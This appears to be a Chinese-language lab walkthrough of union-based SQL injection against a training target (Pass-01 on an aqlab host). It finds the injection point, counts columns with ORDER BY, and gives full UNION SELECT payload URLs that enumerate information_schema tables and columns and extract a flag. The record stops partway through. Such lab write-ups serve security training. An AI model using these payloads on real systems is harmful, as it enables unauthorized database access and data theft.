发布时间:2024-03-14 19:01
链接
http://inject2b.lab.aqlab.cn:81/Pass-01/index.php?id=1
1.首先找注入点:
http://inject2b.lab.aqlab.cn:81/Pass-01/index.php?id=2-1
id=2-1在数据库执行了,找到注入点
2.利用order by猜测字段数
如下,当order by 3能正常返回数据 order by 4无正常回显,说明字段数为3.
order by 4如下:
3.利用联合查询 union获取数据库信息
如下:回显在 2,3位置
3.1 接下来获取当前的数据库名:
当前数据库名为:error
3.2 接下来获取表名
http://inject2b.lab.aqlab.cn:81/Pass-01/index.php?id=1 and 1=2 union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1
error_flag
http://inject2b.lab.aqlab.cn:81/Pass-01/index.php?id=1 and 1=2 union select 1,2,table_name from information_schema.tables where table_schema=database() limit 1,2
user
3.3 接下来获取字段名
http://inject2b.lab.aqlab.cn:81/Pass-01/index.php?id=1 and 1=2 union select 1,2,column_name from information_schema.columns where table_name=‘error_flag’ and database()=‘error’ limit 0,1-- qwe
字段1:Id
字段2:flag
http://inject2b.lab.aqlab.cn:81/Pass-01/index.php?id=1 and 1=2 union select 1,2,column_name from information_schema.columns where table_name=‘error_flag’ and database()=‘error’ limit 1,2-- qwe
字段3:木有
http://inject2b.lab.aqlab.cn:81/Pass-01/index.php?id=1 and 1=2 union select 1,2,column_name from information_schema.columns where table_name=‘error_flag’ and database()=‘error’ limit 2,3-- qwe
3.4 获取error_flag表的数据
http://inject2b.lab.aqlab.cn:81/Pass-01/index.php?id=1 and 1=2 union select 1,2,flag from error_flag limit 0,1-- qwe
zKaQ-NF
http://inject2b.lab.aqlab.cn:81/Pass-01/index.php?id=1 and 1=2 union select 1,2,flag from error_flag limit 1,2-- qwe